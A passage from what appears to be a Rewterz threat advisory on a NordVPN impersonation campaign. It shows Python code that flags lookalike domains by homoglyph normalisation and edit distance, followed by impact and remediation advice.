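            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_domain(domain, protected=PROTECTED, max_distance=1):
    """Return (domain, reason) if it impersonates a protected brand, else None."""
    domain = domain.lower().rstrip(".")
    label = registrable_label(domain)
    norm = normalize(label)
    for brand, legit in protected.items():
        if domain in legit or domain.endswith(tuple("." + d for d in legit)):
            return None                                   # the brand's own domain or a subdomain of it
        if norm == brand and label != brand:
            return (domain, f"'{label}' normalizes to brand '{brand}' (hyphen/homoglyph)")
        if norm == brand:
            return (domain, f"brand '{brand}' on an unauthorised TLD")
        distance = levenshtein(norm, brand)
        if distance <= max_distance:
            return (domain, f"'{label}' is {distance} edit(s) from '{brand}'")
        if brand in norm and len(norm) > len(brand):
            return (domain, f"'{label}' embeds brand '{brand}'")
    return None


def check_domains(domains, **kwargs):
    return [hit for hit in (check_domain(d, **kwargs) for d in domains) if hit]


# Constructed candidates, e.g. from a newly-registered-domain feed or certificate transparency logs.
CANDIDATES = ["nordvpn.com", "nord-vpn.club", "n0rdvpn.net", "nordvpn-setup.download",
              "northvpn.com", "example.com", "cdn.nordvpn.com"]

if __name__ == "__main__":
    for domain, reason in check_domains(CANDIDATES):
        print(f"{domain}: {reason}")
```

Certificate transparency logs are a good source of candidates here: the Let's Encrypt certificate mentioned above was logged publicly the day it was issued, days before the campaign started, which is when a check like this would have raised it.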

Impact

  • Web injections
  • Traffic intercepts
  • Keylogging
  • Information theft

Remediation

  • Download software only from the vendor's own domain, typed directly or from a saved bookmark rather than from search results or links; a padlock and valid certificate do not prove the site belongs to the vendor.
  • Always scan downloaded files before executing them, and compare installer hashes or publisher signatures with what the vendor publishes.

Copyright © Rewterz. All rights reserved.